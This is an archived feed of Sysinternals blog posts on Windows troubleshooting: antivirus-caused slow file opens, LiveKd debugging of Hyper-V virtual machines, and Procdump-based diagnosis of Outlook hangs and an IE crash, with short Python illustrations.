original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/7433.image_5F00_thumb_5F00_57A775FB.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121256iEAC3EB7774CEBAD4" style="background-image: none; border-right-width: 0px; margin: ; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="454" /> </P> <P> Further, the stack frames higher up the same stack showed that the sequence of reads was being performed within the context of Project opening the file, which is a behavior common to on-access virus scanners: </P> <P> <IMG alt="image" border="0" height="284" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/6431.image_5F00_thumb_5F00_3E3F72C1.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121257i73C723A7AE9BA5BA" style="background-image: none; border-right-width: 0px; margin: ; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="454" /> </P> <P> Sure enough, double-clicking on one of the SRTSP64.SYS lines in the stack dialog confirmed that it was Symantec AutoProtect that was repeatedly performing on-access virus detection each time Project opened the file with certain parameters: </P> <P> <IMG alt="image" border="0" height="206" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/5618.image_5F00_thumb_5F00_302C5431.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121258iAEA746D3921E4BF9" style="background-image: none; border-right-width: 0px; margin: ; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; 
border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="356" /> </P> <P> Typically, administrators configure antivirus on file servers, so there’s no need for clients to scan files they reference on servers since client-side scanning simply results in duplicative scans. This led to the support engineer’s second recommendation, which was for the administrator to set an exclusion filter on their client antivirus deployment for the file share hosting user profiles. </P> <P> In less than fifteen minutes the engineer had written up his analysis and recommendations and sent them back to the customer. The Network Monitor trace merely served as confirmation of what he observed in the Process Monitor trace. The administrator proceeded to implement the suggestions and a few days later confirmed that the user was no longer experiencing long file loads or the errors they had reported. Another case closed with Process Monitor and thread stacks. </P> </BODY></HTML> Thu, 27 Jun 2019 07:07:07 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-slow-project-file-opens/ba-p/723952 MarkRussinovich 2019-06-27T07:07:07Z LiveKd for Virtual Machine Debugging https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/livekd-for-virtual-machine-debugging/ba-p/723942 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Oct 09, 2010 </STRONG> <BR /> <P> When <A href="#" target="_blank"> Dave Solomon </A> and I were writing the 3 <SUP> rd </SUP> edition of the Windows Internals book series <I> <A href="#" target="_blank"> Inside Windows 2000 </A> </I> back in 1999, we pondered if there was a way to enable kernel debuggers like Windbg and Kd (part of the free Debugging Tools for Windows package that’s available in the <A href="#" target="_blank"> Windows Platform SDK </A> ) to provide a local interactive view of a running system. 
Dave had introduced kernel debugger experiments in the 2nd edition, <I> <A href="#" target="_blank"> Inside Windows NT, </A> </I> that solidified the concepts presented by the book. For example, the chapter on memory management describes the page frame database, the data structure the system uses to keep track of the state of every page of physical memory, and an accompanying experiment shows how to view the actual data structure definition and contents of PFN entries on a running system using the kernel debugger. At the time, however, the only way to use Windbg and Kd to view kernel information was to attach a second computer with a serial “null modem” cable to the target system booted in debugging mode. The inconvenience of having to purchase an appropriate serial cable and configure two systems for kernel debugging meant that many readers skipped the experiments, even though they might have followed along and deepened their understanding had it been easier. </P> <P> After giving it some thought, I realized that I could fool the debuggers into thinking that they were looking at a crash dump file by implementing a file system filter driver that presented a “virtual” crash dump file debuggers could open. Since a crash dump file is simply a file header followed by the contents of physical memory, the driver could satisfy reads of the virtual dump file with the contents of physical memory, which the driver could easily read from the \Device\PhysicalMemory section object the memory manager creates. A couple of weeks later, <A href="#" target="_blank"> LiveKd </A> was born. We expanded the number of kernel debugger experiments in the book and began using LiveKd in our live Windows Internals seminars and classes as well.&nbsp; LiveKd’s usage went beyond merely being an educational tool and over time it became an integral part of the troubleshooting toolkits of IT pros and Microsoft support engineers. 
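</P> <P> The virtual dump file idea described above, a header followed by the contents of physical memory, can be sketched as a read-mapping function. This is a simplified Python illustration, not LiveKd’s driver code: the names read_virtual_dump, header and read_physical are hypothetical, and the header is treated as an opaque run of bytes. </P>

```python
def read_virtual_dump(offset, length, header, read_physical):
    """Satisfy a read of the virtual dump file (illustrative sketch).

    header        -- bytes of the dump file header (contents not modeled)
    read_physical -- callable(physical_offset, length) returning bytes,
                     standing in for reads of physical memory
    """
    end = offset + length

    # Slicing clips automatically, so this is empty when the request
    # starts beyond the header.
    from_header = bytes(header[offset:end])
    remaining = length - len(from_header)
    if remaining == 0:
        return from_header

    # File offsets past the header map directly onto physical memory.
    physical_offset = max(offset, len(header)) - len(header)
    return from_header + read_physical(physical_offset, remaining)
```

<P> A read that straddles the end of the header is served partly from the header bytes and partly from physical memory, which is all the debugger needs in order to believe it has opened an ordinary dump file. </P> <P> 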
Microsoft even added local kernel debugging capability to Windows XP, but LiveKd can still do a few things that the native support can’t, like saving a copy of the system’s state to a dump file that can <FONT color="#000000"> be examined on a different system, and it works </FONT> <A> <FONT color="#000000"> on Windows Vista/Server 2008 and higher without requiring the system to be booted in debug mode </FONT> </A> <FONT color="#000000"> . </FONT> </P> <H3> Virtual Machine Troubleshooting </H3> <P> The rise of virtualization has introduced a new scenario for live kernel debugging: troubleshooting virtual machines. While LiveKd works just as well inside a virtual machine as on a native installation, the ability to examine a running virtual machine without having to install and run LiveKd in the machine would add convenience and make it possible to troubleshoot virtual machines that are unresponsive or experiencing issues that would make it impossible to even launch LiveKd. Over the last few years I have received requests from Microsoft support engineers for the feature and had started an initial investigation of the approach I’d take to add the support to LiveKd, but I hadn’t gotten around to finishing it. </P> <P> Then a couple of months ago, I came across Matthieu Suiche’s <A href="#" target="_blank"> LiveCloudKd </A> tool, which enables Hyper-V virtual machine debugging and showed that there was general interest in the capability. We were so impressed that we invited Matthieu to speak about live kernel debugging and LiveCloudKd at this year’s <A href="#" target="_blank"> BlueHat Security Briefings </A> , held every year on Microsoft’s campus and taking place this week, where I met him. 
Spurred on by LiveCloudKd, I decided it was time to finish the LiveKd enhancements and sent an email to Ken Johnson, formerly Skywing of <A href="#" target="_blank"> Uninformed.org </A> and now a developer in Microsoft’s security group (he had several times published articles revealing holes in the “Patchguard” kernel tampering protection of 64-bit Windows, so we hired him to help make Windows more secure), asking if he was interested in collaborating. Ken had previously contributed some code to LiveKd that enabled it to run on 64-bit Windows Vista and Windows 7 systems, so working with him was certain to speed the project – little did I know how much. He responded that he’d prototyped a tool for live virtual machine debugging a year before and thought he could incorporate it into LiveKd in a few days. Sure enough, a few days later the beta of LiveKd 5.0 was finished, complete with the Hyper-V live debugging feature. </P> <P> We picked this week to publish it to highlight Matthieu’s tool, which offers some capabilities not present in LiveKd. For example, just like it does for local machine debugging, LiveKd provides a read-only view of the target virtual machine, whereas LiveCloudKd lets you modify it as well. 
</P> <H3> LiveKd Hyper-V Debugging </H3> <P> LiveKd’s Hyper-V support introduces three new command line switches, -p, -hv, and -hvl: </P> <P> <IMG alt="image" border="0" height="238" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/8512.image_5F00_thumb_5F00_57279256.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121247i432272B7F2425BA8" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> When you want to troubleshoot a virtual machine, use -hvl to list the names and IDs of the ones that are active: </P> <P> <IMG alt="image" border="0" height="185" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/3386.image_5F00_thumb_5F00_72A578C3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121248i1570058FDCCD16C3" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> Next, use the -hv switch to specify the one you want to examine. 
You can use either the GUID or the virtual machine’s name, but it’s usually more convenient to use the name if it’s unique: </P> <P> <IMG alt="image" border="0" height="407" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/1541.image_5F00_thumb_5F00_79588246.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121249iEBBE0A263368512E" style="background-image: none; border-right-width: 0px; padding-left: 0px; padding-right: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px; padding-top: 0px" title="image" width="554" /> </P> <P> And that’s all there is to it. You can now run the same commands as you can when using LiveKd on a native system, listing processes and threads, dumping memory, and generating crash dump files for later analysis. </P> <P> The final switch, -p, pauses the virtual machine while LiveKd is connected. Normally, LiveKd reads pages of physical memory as they’re referenced by the debugger, which means that different pages can represent different points in time. That can lead to inconsistencies: for example, when you view a data structure on one page and later view a second structure that it references, the second structure might have been deleted in the meantime. The pause option simply automates the Pause operation you can perform in the Hyper-V Virtual Machine management interface, giving you a frozen-in-time view of the virtual machine while you poke around. </P> <P> Have fun debugging virtual machines and please share any troubleshooting success stories that make use of LiveKd’s new capabilities. 
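</P> <P> For scripting, the three switches described in this section can be assembled into a command line as in the Python sketch below. The switch names come from this post and may differ in other LiveKd versions; the helper name build_livekd_args, and the choice to reject -p without a virtual machine, are assumptions of the sketch. </P>

```python
def build_livekd_args(vm=None, pause=False, list_vms=False):
    """Build a LiveKd argument list from the switches named in the post.

    Hypothetical helper; vm is a virtual machine name or GUID.
    """
    args = ["livekd"]

    # -hvl lists the names and IDs of the active virtual machines.
    if list_vms:
        return args + ["-hvl"]

    if vm is None:
        if pause:
            # Assumption of this sketch: -p only makes sense with -hv.
            raise ValueError("pause requires a virtual machine")
        return args  # plain local-machine debugging

    # -hv selects the virtual machine; -p pauses it while connected.
    args += ["-hv", vm]
    if pause:
        args.append("-p")
    return args
```

<P> The resulting list can be passed to a process launcher such as Python’s subprocess.run, which takes care of quoting virtual machine names that contain spaces. 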
</P> </BODY></HTML> Thu, 27 Jun 2019 07:06:02 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/livekd-for-virtual-machine-debugging/ba-p/723942 MarkRussinovich 2019-06-27T07:06:02Z The Compound Case of the Outlook Hangs https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-compound-case-of-the-outlook-hangs/ba-p/723936 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Aug 21, 2010 </STRONG> <BR /> <P> This case was shared with me by a friend of mine, Andrew Richards, a Microsoft Exchange Server Escalation Engineer. It’s a really interesting case because it highlights the use of a Sysinternals tool I specifically wrote for use by Microsoft support services and it’s actually two cases in one. </P> <BR /> <P> The case unfolds with a systems administrator at a corporation contacting Microsoft support to report that users across their network were complaining of Outlook hangs lasting up to 15 minutes. The fact that multiple users were experiencing the problem pointed at an Exchange issue, so the call was routed to Exchange Server support services. </P> <BR /> <P> The Exchange team has developed a Performance Monitor data collector set that includes several hundred counters that have proven useful for troubleshooting Exchange issues, including LDAP, RPC and SMTP message activity, Exchange connection counts, memory usage and processor usage. Exchange support had the administrator collect a log of the server’s activity with 12-hour log cycles, the first from 9pm until 9am the next morning. 
When Exchange support engineers viewed the log, two patterns were clear despite the heavy density of the plots: first and as expected, the Exchange server’s load increased during the morning when users came into work and started using Outlook; and second, the counter graphs showed a difference in behavior between about 8:05 and 8:20am, a duration that corresponded exactly to the long delays users were reporting: </P> <BR /> <P> <IMG alt="image" border="0" height="169" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/5670.image_5F00_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121237iE7B55FFF3A54AF7B" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <BR /> <P> The support engineers zoomed in and puzzled over the counters in the timeframe and could see Exchange’s CPU usage drop, the active connection count go down, and outbound response latency drastically increase, but they were unable to identify a cause: </P> <BR /> <P> <IMG alt="image" border="0" height="424" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/5582.image_5F00_thumb_5F00_8.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121238i3EB5654A990E0F63" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <BR /> <P> They escalated the case to the next level of support and it was assigned to Andrew. Andrew studied the logs and concluded that he needed additional information about what Exchange was doing during an outage. Specifically, he wanted a process memory dump of Exchange when it was in the unresponsive state. 
This would contain the contents of the process address space, including its data and code, as well as the register state of the process’s threads. Dump files of the Exchange process would allow Andrew to look at Exchange’s threads to see what was causing them to stall. </P> <BR /> <P> One way to obtain a dump is to “attach” to the process with a debugger like Windbg from the <A href="#" target="_blank"> Debugging Tools for Windows package </A> (included with the Windows Software Development Kit) and execute the .dump command, but downloading and installing the tools, launching the debugger, attaching to the right process, and saving dumps is an involved procedure. Instead, Andrew directed the administrator to download the <A href="#" target="_blank"> Sysinternals Procdump </A> utility (a single utility that you can run without installing any software on the server). Procdump makes it easy to obtain dumps of a process and includes options that create multiple dumps at a specified interval. Andrew asked the administrator to run Procdump the next time the server’s CPU usage dropped so that it would generate five dumps of the Exchange Server engine process, Store.exe, spaced three seconds apart: </P> <BR /> <BLOCKQUOTE> <BR /> <P> <SPAN style="font-family: Courier New;"> <SPAN style="font-size: small;"> procdump -n 5 -s 3 store.exe c:\dumps\store_mini.dmp </SPAN> </SPAN> </P> <BR /> </BLOCKQUOTE> <BR /> <P> The next day the problem reproduced and the administrator sent Andrew the dump files Procdump had generated. When a process temporarily hangs it’s often because one thread in the process acquires a lock protecting data that other threads need to access, and holds the lock while performing some long-running operation. Andrew’s first step was therefore to check for held locks. 
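</P> <P> The hang pattern just described, one thread holding a lock through a long-running operation while other threads pile up behind it, can be reproduced in miniature. The Python sketch below is only an analogy for what happens inside a process like Store.exe; the function name simulate_held_lock and its parameters are hypothetical, and a sleep stands in for the long-running operation. </P>

```python
import threading
import time


def simulate_held_lock(hold_seconds=0.2, waiter_count=3):
    """Return how long each waiter thread was blocked on the lock."""
    lock = threading.Lock()
    owner_has_lock = threading.Event()
    results_guard = threading.Lock()
    wait_times = []

    def owner():
        # The owner takes the lock, then performs a long operation
        # (simulated with sleep) without releasing it.
        with lock:
            owner_has_lock.set()
            time.sleep(hold_seconds)

    def waiter():
        started = time.monotonic()
        with lock:  # blocks until the owner releases the lock
            blocked_for = time.monotonic() - started
        with results_guard:
            wait_times.append(blocked_for)

    owner_thread = threading.Thread(target=owner)
    owner_thread.start()
    owner_has_lock.wait()  # start waiters only once the lock is held

    waiters = [threading.Thread(target=waiter) for _ in range(waiter_count)]
    for thread in waiters:
        thread.start()
    for thread in waiters + [owner_thread]:
        thread.join()
    return wait_times
```

<P> Every waiter reports a delay close to the time the owner spent holding the lock. In a dump taken during such a stall, this shows up as several threads waiting on a lock owned by a single thread, which is why listing held locks is a natural first step. </P> <P> 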
The most commonly used intra-process synchronization lock is a <A href="#" target="_blank"> critical section </A> and the !locks debugger command lists the critical sections in a dump that are locked, the thread ID of the thread owning the lock, and the number of threads waiting to acquire it. Andrew used a similar command, !critlist from the Sieext.dll debugger extension (the public version of which, Sieextpub.dll, is downloadable from <A href="#" target="_blank"> here </A> ). The output showed that multiple threads were piled up waiting for thread 223 to release a critical section: </P> <BR /> <P> <IMG alt="image" border="0" height="67" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/1781.image_5F00_thumb_5F00_9.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121239iD02AE08248755F56" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <BR /> <P> His next step was to see what the owning thread was doing, which might point at the code responsible for the long delays. 
He switched to the owning thread’s register context using the ~ command and then dumped the thread’s stack with the k command: </P> <BR /> <P> <IMG alt="image" border="0" height="220" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/6574.image_5F00_thumb_5F00_13.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121240iA5D97CC26E7DDCD4" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <BR /> <P> As we’ve seen in previous Case of the Unexplained cases, the debugger was unsure how to interpret the stack when it came across a stack frame pointing into Savfmsevsapi, an image for which it couldn’t obtain symbols. Most Windows images have their symbols posted on the Microsoft symbol server so this was likely a third-party DLL loaded into the Store.exe process and was therefore a suspect in the hangs. The list modules (“lm”) command dumps version information for loaded images and the&nbsp;path of the image made it obvious that Savfmsevsapi was part of Symantec’s mail security product: </P> <BR /> <P> <IMG alt="image" border="0" height="243" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/7673.image_5F00_thumb_5F00_14.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121241i96CABF018AA06AEE" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <BR /> <P> Andrew checked the other dumps and they all had similar stack traces. With the anecdotal evidence seeming to point at a Symantec issue, Andrew forwarded the dumps and his analysis, with the administrator’s permission, to Symantec technical support. 
Several hours later they reported that the dumps indeed revealed a problem with the mail application’s latest antivirus signature distribution and forwarded a patch to the administrator that would fix the bug. He applied it and continued to monitor the server to verify the fix. Sure enough, the server’s performance established fairly regular activity levels and the long delays disappeared. </P> <BR /> <P> However, over the subsequent days the administrator started to receive, albeit at a lower rate, complaints from several users that Outlook was sporadically hanging for up to a minute. Andrew asked the administrator to send a correlating 12-hour Performance Monitor capture with the Exchange data collection set, but this time there was no obvious anomaly: </P> <BR /> <P> <IMG alt="image" border="0" height="178" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/0724.image_5F00_thumb_5F00_15.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121242iA979A3DAE9991829" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <BR /> <P> Wondering if the hangs would be visible in the CPU usage history of Store.exe, he removed all the counters except for Store’s processor usage counter. 
When he zoomed in on the morning hours when users began to log in and load on the server increased, he noticed three spikes around 8:30am: </P> <BR /> <P> <IMG alt="image" border="0" height="131" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/0383.image_5F00_thumb_5F00_2.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121243i0DB9B1F976AFC390" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <BR /> <P> Because the server had eight cores, the processor usage counter for an individual process had a possible range between 0 and 800, so the spikes were far from taxing the system, but definitely higher than Exchange’s typical range on that system. Zooming in further and setting the graph’s vertical scale to make the spikes more distinct, he observed that average CPU usage was always below about 75% of a single core and the spikes were 15-30 seconds long: </P> <BR /> <P> <IMG alt="image" border="0" height="385" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/8371.image_5F00_thumb_5F00_3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121244iBB9FF508BD27D3D7" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="448" /> </P> <BR /> <P> What was Exchange doing during the spikes? They were too short-lived and random for the administrator to run Procdump as he had before and reliably capture dumps when they occurred. Fortunately, I designed Procdump with this precise scenario in mind. It supports several trigger conditions that, when met, cause it to generate a dump. 
For example, you can configure Procdump to generate a dump of a process when the process terminates, when its private memory usage exceeds a certain value, or even based on the value of a performance counter you specify. Its most basic trigger, though, is the CPU usage of the process exceeding a specified threshold for a specified length of time. </P> <BR /> <P> The Performance Monitor log gave Andrew the information he needed to craft a Procdump command line that would capture dumps for future CPU spikes: </P> <BR /> <BLOCKQUOTE> <BR /> <P> <SPAN style="font-family: Courier New;"> <SPAN style="font-size: small;"> procdump.exe -n 20 -s 10 -c 75 -u store.exe c:\dumps\store_75pc_10sec.dmp </SPAN> </SPAN> </P> <BR /> </BLOCKQUOTE> <BR /> <P> The arguments configure Procdump to generate a dump of the Store.exe process when Store’s CPU usage exceeds 75% (-c 75) relative to a single core (-u) for 10 seconds (-s 10), to generate up to 20 dumps (-n 20) and then exit, and to save the dumps in the C:\Dumps directory with names that begin with “store_75pc_10sec”. The administrator executed the command before leaving work and when he checked on its progress the next morning it had finished creating 20 dump files. He emailed them to Andrew, who proceeded to study them in the Windbg debugger one by one. </P> <BR /> <P> When Procdump generates a dump because the CPU usage trigger is met, it sets the thread context in the dump file to the thread that was consuming the most CPU at the time of the dump. Since the debugger’s stack-dumping commands are relative to the current thread context, simply entering the stack dumping command shows the stack of the thread most likely to have caused a CPU spike. Over half the dumps were inconclusive, apparently captured after the spike that triggered the dump had already ended, or with threads that were executing code that obviously wasn’t directly related to a spike. 
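</P> <BR /> <P> The threshold-for-a-duration idea behind the CPU trigger can be sketched in a few lines of Python. This is not Procdump’s implementation, just a simplified model under stated assumptions: usage is sampled once per second as a percentage of a single core, a dump fires after the threshold has been exceeded for a given number of consecutive samples, and the count restarts after each dump. The function names are hypothetical. </P>

```python
def share_of_system(single_core_percent, cores):
    """Convert a percentage of one core into a percentage of the whole machine."""
    return single_core_percent / cores


def dump_trigger_times(samples, threshold, sustain, max_dumps):
    """Return the sample indexes (seconds) at which a dump would fire.

    samples   -- one CPU reading per second, as percent of a single core
    threshold -- usage that must be exceeded (compare -c 75)
    sustain   -- consecutive seconds above the threshold (compare -s 10)
    max_dumps -- stop after this many dumps (compare -n 20)

    Assumption for this sketch: the consecutive-seconds count restarts
    after every dump. The real tool may behave differently.
    """
    triggers = []
    run = 0
    for second, usage in enumerate(samples):
        run = run + 1 if usage > threshold else 0
        if run >= sustain:
            triggers.append(second)
            run = 0
            if len(triggers) == max_dumps:
                break
    return triggers


if __name__ == "__main__":
    # A 12-second spike fires one dump; a 9-second spike is too short.
    log = [10] * 5 + [90] * 12 + [20] * 3 + [80] * 9
    print(dump_trigger_times(log, threshold=75, sustain=10, max_dumps=20))
    # 75% of one core on an eight-core server, as a share of the machine.
    print(share_of_system(75, 8))
```

<P> The model also hints at why some dumps can be inconclusive: by the time the duration condition is satisfied, a short spike may already be winding down. </P> <BR /> <P>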
However, several of the dumps had stack traces similar to this one: </P> <BR /> <P> <IMG alt="image" border="0" height="263" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/1856.image_5F00_thumb_5F00_6.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121245i33F82EB5DE6311EE" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="475" /> </P> <BR /> <P> The stack frame that stuck out listed Store’s EcFindRow function, which implied that the spikes were caused by lengthy database queries, the kind that execute when Outlook accesses a mailbox folder with thousands of entries. With this clue in hand, Andrew suggested the administrator create an inventory of large mailboxes and pointed him at <A href="#" target="_blank"> an article </A> the Exchange support team had written that describes how to do this for each version of Exchange: </P> <BR /> <P> <IMG alt="image" border="0" height="91" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/6253.image_5F00_thumb_5F00_7.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121246iC9A333446A331D25" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <BR /> <P> Sure enough, the script identified several users with folders containing tens of thousands of items. The administrator asked the users to reduce their item count to well below 5000 (the Exchange 2003 recommendation – this has been increased in each version with a recommendation of 100,000 in Exchange 2010) by archiving the items, deleting them, or organizing them into subfolders. 
Within a couple of days they had reorganized the problematic folders and user complaints ceased entirely. Ongoing monitoring of the Exchange server over the following week confirmed that the problem was gone. </P> <BR /> <P> With the help of Procdump, the compound case of the Outlook hangs was successfully closed. </P> </BODY></HTML> Thu, 27 Jun 2019 07:05:37 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-compound-case-of-the-outlook-hangs/ba-p/723936 MarkRussinovich 2019-06-27T07:05:37Z The Case of the Random IE Crash https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-random-ie-crash/ba-p/723924 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Jun 01, 2010 </STRONG> <BR /> <P> While I long for the day when I no longer experience the effects of buggy software, there’s something rewarding about solving my own troubleshooting cases. In the process, I often come up with new techniques to add to my bag of tricks and to share with you in my “ <STRONG> Case of the Unexplained…” </STRONG> presentations and blog posts. The other day I successfully closed an especially interesting case that opened when Internet Explorer (IE) crashed as I was reading a web page: </P> <BR /> <P> <IMG alt="image" border="0" height="180" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/5824.image_5F00_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121226iFD4EB653831639BA" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="355" /> </P> <BR /> <P> Whenever I experience a crash, whether it’s the system or an application, I always take a look at it. There’s no guarantee, but many times after spending just a few minutes I find clues that point at an add-on as the cause and ultimately a fix or workaround. 
In most cases when it’s an application crash, the faulty process is obvious and I simply launch Windbg (from the free Debugging Tools for Windows package that comes with the Windows SDK and Windows DDK), attach it to the process, and start investigating. </P> <BR /> <P> Sometimes, however, the faulting process isn’t obvious, as was the case when I saw the IE crash dialog. That’s because I was running IE8, which has a multi-process model where different tabs are hosted in different processes: </P> <BR /> <P> <IMG alt="image" border="0" height="105" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/2275.image_5F00_thumb_5F00_2.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121227iA935C25F25ED4B94" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="183" /> </P> <BR /> <P> I had multiple tabs open as usual, so I had to figure out which IE process of the four that were running (in addition to the parent broker instance) was the one that had crashed. I could have taken the brute-force approach of attaching to each process in turn and searching for the faulting thread, but there’s fortunately a simpler and more direct way to identify the target process. </P> <BR /> <P> When a process crashes, the Windows Error Reporting (WER) service launches its own process, called WerFault, in the session of the crashed process to display the error dialog to the user running the session and to generate a crash dump file. So that WerFault knows which process is the one that crashed, the WER service passes the process ID (PID) of the target on WerFault’s command line. You can easily view the command line with Process Explorer. 
Because I always have Process Explorer running with its icon visible in the tray area of the taskbar, I clicked on the icon to open it and found the WER process in the process tree: </P> <BR /> <P> <IMG alt="image" border="0" height="81" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/0624.image_5F00_thumb_5F00_1.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121228iEB6918C8C0EFA31D" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="504" /> </P> <BR /> <P> I double-clicked on it to open the process properties dialog and the command line revealed the process ID of the problematic IE process: </P> <BR /> <P> <IMG alt="image" border="0" height="250" original-url="http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-52-36-metablogapi/4331.image_5F00_thumb_5F00_4.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121229iFC0137757EE70923" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="404" /> </P> <BR /> <P> Now that I knew it was process 4440 in which I was interested, I started Windbg, pressed F6 to open the process selection dialog, and double-clicked on Iexplore.exe process 4440. With Windbg attached, my next step was to locate the thread that had faulted so that I could examine its stack for signs of a buggy add-on. In some cases, relying on Windbg’s built-in crash analysis heuristics, which you can trigger with the <EM> !analyze </EM> command, will do the job for you, but it didn’t this time. Finding the faulting thread is fairly straightforward, though. </P> <BR /> <P> First, go to Windbg’s View menu and open both the Processes and Threads and the Call Stack dialogs, arranging them side by side. 
